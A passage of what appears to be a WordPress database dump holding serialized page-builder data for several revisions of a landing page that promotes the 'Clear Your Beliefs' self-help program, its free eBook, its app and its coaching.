Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1099, 1589, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1385:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program can help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2641:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality. So the important questions are:  “What do I want to experience?," "What belief is creating this experiences I don''t like?"  and "What is the most effective way to change my beliefs?”\n\n<strong>This is it.</strong>  I’ve created a method that clients and students have called “the magic wand of belief change.”\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s also a lot of fun? And easy?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1100, 1590, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1385:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program can help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2656:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality. \n\nSo the important questions are:  \n  - <em>What do I want to experience? \n  - What belief is creating this experience I don''t want? \n  - How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method there is.</strong>  Clients and students call it <em>“The Magic Wand.”</em>\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s also a lot of fun? And easy?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1101, 1591, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1385:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program can help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2656:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality. \n\nSo the important questions are:  \n  - <em>What do I want to experience? \n  - What belief is creating this experience I don''t want? \n  - How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method there is.</strong>  Clients and students call it <em>“The Magic Wand.”</em>\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s also a lot of fun? And easy?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 